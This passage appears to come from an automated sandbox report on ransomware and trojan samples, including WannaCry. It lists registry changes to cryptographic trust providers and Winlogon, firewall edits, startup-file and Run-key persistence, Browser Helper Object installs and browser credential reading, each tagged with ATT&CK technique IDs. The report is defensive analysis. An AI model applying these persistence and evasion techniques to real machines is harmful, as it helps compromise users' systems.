Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{000C10F1-0000-0000-C000-000000000046}\FuncName = "+ª‹i\"¼f‡Q°8ÊñH\x05U\x19ä\a:åH}¦¡\x1aÊ%"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{1A610570-38CE-11D4-A2A3-00104BD35090}\FuncName = "Ì6ÞD÷&#7Z’¢g\x06^l˜Ÿ8Ý¿¨ð\u008fg2ÍºŸ"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\#2223\FuncName = "¡\x18B\x03øÐ@¾ë¾\x18ˆ\x15%iÞpy7iîQ\x7f\x1f&»VQ"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\Initialization\{00AAC56B-CD44-11D0-8CC2-00C04FC295EE}\$DLL = "ø—±Ö»œ%lEbpJÎ¦\x02–áéìƒ… Âã¸öp\u00a0"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{000C10F1-0000-0000-C000-000000000046}\Dll = "º²Ç\x0e`8¨„aÿç”DŠ&Y+ë÷‡\x17x~jk\u008d\x18\r"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 1\CryptDllFormatObject\1.3.6.1.5.5.7.3.4\FuncName = "ju¢\acZ;\x10&wª%Ù"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSealedDigest\{C689AABA-8E78-11D0-8C47-00C04FC295EE}\FuncName = "I§—.œH\x173¬‰ÒU¿\b\u008fï¹Üø‹K\x1adøR´Ën"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\#2011\FuncName = "_ž\t.Ž/»çÇüx\|ZÄUf0¤òšèjç„!{¨á"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\1.3.6.1.4.1.311.2.1.26\FuncName = "aJ\tÛ“\"ì(`x¹°£O6«NCØòðQÿÜ‡Î\x19¯"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\CertCheck\{C6B2E8D0-E005-11CF-A134-00C04FD7BF43}\$DLL = "w•ÏRÎSsn\f1\x17€UÉ2@ŽAn(H\x01\|ù9\f\x02u"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\Usages\1.3.6.1.4.1.311.10.3.3\CallbackAllocFunction = "éû“EâÐÿÁjŠA‹ÂEƒz\u008f‰ì5!\x13\x02Ü)ë\x02f"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{C689AAB8-8E78-11D0-8C47-00C04FC295EE}\Dll = "02Ùø-\u0081‘/õ\x14˜n\aS´~ÑB©f[Ð>Á@FýŒ"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{DE351A42-8E59-11D0-8C47-00C04FC295EE}\FuncName = "‹õ¤n§Üí\|Þê>µ\x18Ì´+ö‹‰ŽµJÝÔœ\u008fŠÖ"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\#2000\Dll = "³5çÊv\x17\u0090äÈ½\x1b\x1c3wÍ\x1cõÀ†§ÙÁ€—¤eäŒ"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\Initialization\{573E31F8-DDBA-11D0-8CCB-00C04FC295EE}\$Function = "½\x17=¬¶¸î¸_\aº\"ßÎA»xõ~\x1eÒäZ¾¼÷Ïñ"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\Initialization\{6078065b-8f22-4b13-bd9b-5b762776f386}\$Function = "¡e÷\x19qSé§²\x0eòlQ¨\a¬v‹„\x1e\x1b\x16\x16±§}¼W"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllIsMyFileType2\{5598CFF1-68DB-4340-B57F-1CACF88C9A51}\Dll = "ÂKÃ©Ïl:…œƒ…Â<\x1dq¼šÚú÷Ã5+€•\"E™"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{0AC5DF4B-CE07-4DE2-B76E-23C839A09FD1}\FuncName = "²ˆ~«`Ó²\x13™$N‚ÖÏcv"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\CertCheck\{00AAC56B-CD44-11D0-8CC2-00C04FC295EE}\$Function = "Ÿõ.Œ=“¸™2Ñ„´Þ\\ì\x11\x02šÎP\x1eŠÈ\bµâi$"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{06C9E010-38CE-11D4-A2A3-00104BD35090}\Dll = "F&èþr±W\x0f~‚ÎÀ¹aRöTeŽ\u00ad$¢\x128ây!Â"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{CF78C6DE-64A2-4799-B506-89ADFF5D16D6}\Dll	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.80.1!7\Name = "¡&w·äý\u00a0±6*\u00adzü…’MÞÏI`ÚÎ\x14L\x16EJŒ"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{DE351A43-8E59-11D0-8C47-00C04FC295EE}\FuncName = " $¾ª\x0fù“ŒùYËÊÙ\u0090(%Jj¥\f£¨¶=%wvq"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\Message\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\$DLL = "ÒkƒX0Õ—ú$›Ç8):±µo>Ñåà™7ovø´Ó"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{000C10F1-0000-0000-C000-000000000046}\FuncName = "mÏNk‘SšÀÝ±6ø~3ô¢;oâ9\x7fY}¯šë°\x18"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\Certificate\{00AAC56B-CD44-11D0-8CC2-00C04FC295EE}\$Function = "¶¿ã÷õU(#¹ÃöA\x11Õ:\u008fÂ¢†<\x1b^±›zÐ\x1fy"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\Cleanup\{6078065b-8f22-4b13-bd9b-5b762776f386}\$Function = "ú§÷\x03¡\u009d\x0f\u008f®ß\x10H\"Ã+æ\x0e\x19u\u009d\x18"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\FinalPolicy\{7801EBD0-CF4B-11D0-851F-0060979387EA}\$DLL = "7cæEp\v¬‚æ×\x17†ÔÝ\x1cƒóñ\x1f\u009dr°O\t‹Â67"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\Signature\{189A3842-3041-11D1-85E1-00C04FC295EE}\$Function = "Šó?ÝÏË¦Ú\x1b\x18½“‚öø½½r\u00a0—' p'\x01XbÅ"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{CF78C6DE-64A2-4799-B506-89ADFF5D16D6}\Dll = "æÓQª\x1e}"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\CertCheck\{573E31F8-AABA-11D0-8CCB-00C04FC295EE}\$Function = "‰²£DžE³Õ\x14C\x17¿1e®\x05´Â/ç_JÞ€ºÆf\x11"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\Initialization\{D41E4F1F-A407-11D1-8BC9-00C04FA30A41}\$Function = "Ð‡ÇwWhÛL¶wµï\u0090\v±°¶‹\x19êf…\u00ad)ì\"3Y"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{DE351A42-8E59-11D0-8C47-00C04FC295EE}\Dll = "\x7f¹©>\u00adMû\x11“‰Ó#ÄoÍZ0©\x03Žz\""	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{5598CFF1-68DB-4340-B57F-1CACF88C9A51}\Dll = "Sm:ZÕ\x18¨Ÿ“'\x0e\u008f`éêƒ×ñì\x15'ñHfÖš´Ê"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust\Initialization\{7801EBD0-CF4B-11D0-851F-0060979387EA}\$Function = "×ž'z\x15îˆ*\x06˜v=Õç~ÊÔ\u009d‘(\u0081\\]\u00a0V˜Ûo"	cmd.exe

Modifies Windows Firewall 2 TTPs 2 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
6060	netsh.exe
4128	netsh.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	FreeYoutubeDownloader.exe

Drops startup file 7 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BitcoinMiner.bat.WCRY	WannaCry.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BitcoinMiner.bat	xcopy.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BitcoinMiner.bat	xcopy.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BitcoinMiner.bat	xcopy.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SD4CF0.tmp	WannaCry.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SD4CF7.tmp	WannaCry.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BitcoinMiner.bat.WCRYT	WannaCry.exe

Executes dropped EXE 16 IoCs

pid	Process
6160	RKill_V2.9.1.0.exe
5140	RKill_V2.9.1.064.exe
5720	FreeYoutubeDownloader.exe
2452	Free YouTube Downloader.exe
3040	RKill_V2.9.1.0.exe
5708	RKill_V2.9.1.064.exe
6936	WannaCry.exe
2884	!WannaDecryptor!.exe
5640	!WannaDecryptor!.exe
7048	!WannaDecryptor!.exe
4360	!WannaDecryptor!.exe
4056	RKill_V2.9.1.0.exe
920	RKill_V2.9.1.064.exe
3676	VeryFun.exe
6600	RKill_V2.9.1.0.exe
6704	RKill_V2.9.1.064.exe

Obfuscated with Agile.Net obfuscator 2 IoCs

Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.

agilenet

resource	yara_rule
behavioral1/memory/6616-4460-0x00000000004D0000-0x00000000004FA000-memory.dmp	agile_net
behavioral1/files/0x0007000000023ff1-5343.dat	agile_net

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Free Youtube Downloader = "C:\\Windows\\Free Youtube Downloader\\Free Youtube Downloader\\Free YouTube Downloader.exe"	FreeYoutubeDownloader.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft Update Task Scheduler = "\"C:\\Users\\Admin\\Downloads\\WannaCry.exe\" /r"	WannaCry.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft Update Task Scheduler = "\u00adÊÖ¬\x05«²=†>‹Ü®\tXWd9\x1a\x7f9šE³q±ðÔ"	cmd.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	cmd.exe

Installs/modifies Browser Helper Object 2 TTPs 6 IoCs

BHOs are DLL modules which act as plugins for Internet Explorer.

stealer adware

Modify Registry

T1112

Browser Extensions

T1176

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\ = "Ï3¾n¿\u00adk†H\x04ãvô<Ò£+V\x06É\u0090‹òóÙ\|èH"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C}\NoExplorer = "ôàÒ}<(\x1d8œ\n›\x01ÕVØ°óŽ—S\f°Z\fÈÃœM"	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{31D09BA0-12F5-4CCE-BE8A-2923E76605DA}	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{31D09BA0-12F5-4CCE-BE8A-2923E76605DA}\ = "ä‚wy9T~L\n:X~‚\u00a0²ŠIÀ\x11\u00adhÏI`¼ü~Û"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{31D09BA0-12F5-4CCE-BE8A-2923E76605DA}\NoExplorer = "¢#A\u0090\x11:\x1akMa‚4äg²ù’eÍÊ¯>²„‹AXk"	cmd.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs

Web Service

T1102

flow	ioc
224	raw.githubusercontent.com
225	raw.githubusercontent.com
860	drive.google.com
861	drive.google.com
880	drive.google.com

Mark of the Web detected: This indicates that the page was originally saved or cloned. 1 IoCs

phishing motw

flow	ioc
458	https://storage.googleapis.com/script.aniview.com/ssync/62f53b2c7850d0786f227f64/ssync.html

Modifies WinLogon 2 TTPs 64 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\DefaultUserName = "‡æ•f"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{426031c0-0b47-4852-b0ca-ac3d37bfcb39}\ = "›\u009d\x1bÁPD?<H™º%É—\u008fÛ\x1e“¶y\x0eI½Ö÷r,H"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{7933F41E-56F8-41d6-A31C-4148A711EE93}\ProcessGroupPolicy = "Å\x0fm¿\tØ×Þ€c\x06Qr%\x04;\x1f\x05pø¬Ã\x1d«¸÷øo"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{25537BA6-77A8-11D2-9B6C-0000F8080861}\ = "¶\x12\fûËQ}$0Hs”\u008d\u0090\x1f!w¯*\x11t74A®ï\bú"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{25537BA6-77A8-11D2-9B6C-0000F8080861}\GenerateGroupPolicy = "\b¼\x0fS<¹c‡Àƒ\x1b‘Ð¾V™¨TðèH\x0eË˜NáN\x1c"	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{3A0DBA37-F8B2-4356-83DE-3E90BD5C261F}	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{426031c0-0b47-4852-b0ca-ac3d37bfcb39}\DisplayName = "£Ô\x7fÏ\|YÀiË[f²ÜxM„–$00Ô‡Ê>.\x1cY1"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{827D319E-6EAC-11D2-A4EA-00C04F79F83A}\ProcessGroupPolicy = "â±\x17Ã}CÏ\x1dkpv¿—D—6.Æ°Ïú5\x17<º’»:"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{cdeafc3d-948d-49dd-ab12-e578ba4af7aa}\ProcessGroupPolicy = "äx–\x18'\x10\x01Q›Fd\x16ÞÅòmrÇÑ®÷\vˆ´Ð°\x0f."	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{e437bc1c-aa7d-11d2-a382-00c04f991e27}\ = "+‚²\bÁ2ôšH:Ñ-æ¾Tjï®œXf<I…øF‘("	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{E5094040-C46C-4115-B030-04FB2E545B00}	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{1A6364EB-776B-4120-ADE1-B63A406A76B5}	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{25537BA6-77A8-11D2-9B6C-0000F8080861}	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{426031c0-0b47-4852-b0ca-ac3d37bfcb39}\DllName = "ÁY\x15Mo™Ñ\|·\x0eäOb&‹çÖE?Á´))PÎŸäŸ"	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{7150F9BF-48AD-4da4-A49C-29EF4A8369BA}	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{8A28E2C5-8D06-49A4-A08C-632DAA493E17}\DllName = "\t¿\u008d'Þ¬ˆ\x11e\x17Wf\x1e8dz\u0090s½ß\x17\x1fë\x1bñ\x02Éå"	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{A3F3E39B-5D83-4940-B954-28315B82F0A8}	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{cdeafc3d-948d-49dd-ab12-e578ba4af7aa}\DllName = "\"\vÜï¶±Ïlˆ\x1d\x17t\x06a\x0f\u008faÙélxÿo\|-;tæ"	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{CF7639F3-ABA2-41DB-97F2-81E2C5DBFC5D}	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{e437bc1c-aa7d-11d2-a382-00c04f991e27}\GenerateGroupPolicy = "‡X“÷Õ¨š\x1dR\u0081A°C·ž\x19rÖh¥˜ûÛ•N·Ú¦"	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{fbf687e6-f063-4d9f-9f4f-fd9a26acdd5f}	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{25537BA6-77A8-11D2-9B6C-0000F8080861}\DisplayName = "P\u00a0Ö\x04^“Õ\x0feÝÅÒûÛEÌtòÎVÝKcIˆ\x17Ò\x05"	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{91FBB303-0CD5-4055-BF42-E512A681B325}	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{C631DF4C-088F-4156-B058-4375F0853CD8}	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{0E28E245-9368-4853-AD84-6DA3BA35BB75}	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{17D89FEC-5C44-4972-B12D-241CAEF74509}	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{B087BE9D-ED37-454f-AF9C-04291E351182}	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{F9C77450-3A41-477E-9310-9ACD617BD9E3}	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{FB2CA36D-0B40-4307-821B-A13B252DE56C}\DllName = "‚€–s‹ãÅMÜÀ\x1e2ßµŠ÷¡V\x15 Ñ®\x054\x0eè\x1a„"	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{728EE579-943C-4519-9EF7-AB56765798ED}	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{e437bc1c-aa7d-11d2-a382-00c04f991e27}	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{7933F41E-56F8-41d6-A31C-4148A711EE93}\ = "Š¿…ïÌ·IÒŽÅe¹\a¤¸ÖÅˆ˜ª_!&Òmå¶y"	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{AADCED64-746C-4633-A97C-D61349046527}	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{B587E2B1-4D59-4e7e-AED9-22B9DF11D053}	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{BC75B1ED-5833-4858-9BB8-CBF0B166DF9D}	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\DefaultDomainName = "\rÚÞ\x0fÊ¬\x02\x10àY\x1e]’†³\x7fî“'{ò\nMÞÀ-[Î"	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{42B5FAAE-6536-11d2-AE5A-0000F87571E3}	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{5794DAFD-BE60-433f-88A2-1A31939AC01F}	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{7909AD9E-09EE-4247-BAB9-7029D5F0A278}	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{7933F41E-56F8-41d6-A31C-4148A711EE93}	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{7933F41E-56F8-41d6-A31C-4148A711EE93}\DllName = "´x(Ð"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{827D319E-6EAC-11D2-A4EA-00C04F79F83A}\DllName = "ÎÉ‘§ª·\u0081A…\x18ÌUQòò\x0eŠP\|œj;QþífÔë"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{827D319E-6EAC-11D2-A4EA-00C04F79F83A}\GenerateGroupPolicy = "¥þ^JfhTrX)u#ÁJ\aW¼mjòT9Å‚ý§¸þ"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{8A28E2C5-8D06-49A4-A08C-632DAA493E17}\ = "o\u00a0Yó3:ÄQÿö4èM_òF¨r\fhÜÇV–\x1e<Ü±"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{8A28E2C5-8D06-49A4-A08C-632DAA493E17}\ExtensionEventSource = "Ù×°þ¦\x18×¿~p¹\x01\x0e{\x06Î„©‡½Ä+‡²\|ø4ß"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{8A28E2C5-8D06-49A4-A08C-632DAA493E17}\ProcessGroupPolicyEx = "Ã~4]³d.M@\x11'w2\x15\u00adBó%kÍÎçÎkŒ\vÔ>"	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{cdeafc3d-948d-49dd-ab12-e578ba4af7aa}	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{E47248BA-94CC-49c4-BBB5-9EB7F05183D0}	cmd.exe
